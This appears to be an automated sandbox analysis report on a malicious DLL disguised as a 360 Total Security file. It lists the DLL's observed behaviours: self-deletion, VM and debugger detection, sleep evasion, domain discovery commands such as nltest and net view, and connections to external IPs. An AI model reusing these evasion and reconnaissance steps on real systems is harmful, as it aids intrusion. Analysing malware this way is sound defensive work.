Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Drops PE files
Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll Jump to dropped file
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 3_2_0000000180049AEC

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\System32\rundll32.exe File deleted: c:\users\user\desktop\360total.dll.dll Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 3_2_0000000180062148
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\rundll32.exe Code function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection, 3_2_00000001800655A8
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC 3_2_0000000180049AEC
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Contains functionality to query network adapater information
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 4_2_00000203431C68E8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 4_2_00000203431C7FA8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 9_2_00000223801368E8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 9_2_0000022380137FA8
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 825 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 8912 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\System32\rundll32.exe API coverage: 0.1 %
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC 3_2_0000000180049AEC
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\rundll32.exe TID: 4288 Thread sleep count: 262 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4288 Thread sleep time: -262000s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4424 Thread sleep count: 825 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4424 Thread sleep time: -82500s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4288 Thread sleep count: 8912 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4288 Thread sleep time: -8912000s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Queries the current domain controller via net
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431CA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 4_2_00000203431CA350
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00000203431C1A08
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013A350 FindFirstFileW,FindNextFileW,LoadLibraryW, 9_2_000002238013A350
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380131A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 9_2_0000022380131A08
Source: Amcache.hve.8.dr Binary or memory string: VMware
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFE88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MWrod_VMware_SATA_CD00#4&224f42ef&
Source: rundll32.exe, 00000004.00000002.2040462096.0000020342FFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rod_VMware_SATA_CD00
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFED9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: rundll32.exe, 00000009.00000002.3284572654.00000223820D0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: Amcache.hve.8.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFEEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWU
Source: Amcache.hve.8.dr Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
Checks if the current process is being debugged
Source: C:\Windows\System32\loaddll64.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0000000180070760
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW, 3_2_0000000180066C3C
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 3_2_00000001800033E0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000A7AC GetProcessHeap, 3_2_000000018000A7AC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_000000018006F6E0

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.219.28 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.136.103 443 Jump to behavior
Contains functionality to launch a program with higher privileges
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180066A50 memset,GetModuleFileNameW,GetCommandLineW,memset,ShellExecuteExW,CloseHandle, 3_2_0000000180066A50
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle, 3_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 3_2_0000000180049278
Source: Update_79066994.dll.4.dr Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
Source: rundll32.exe Binary or memory string: Progman
Source: rundll32.exe Binary or memory string: Program manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
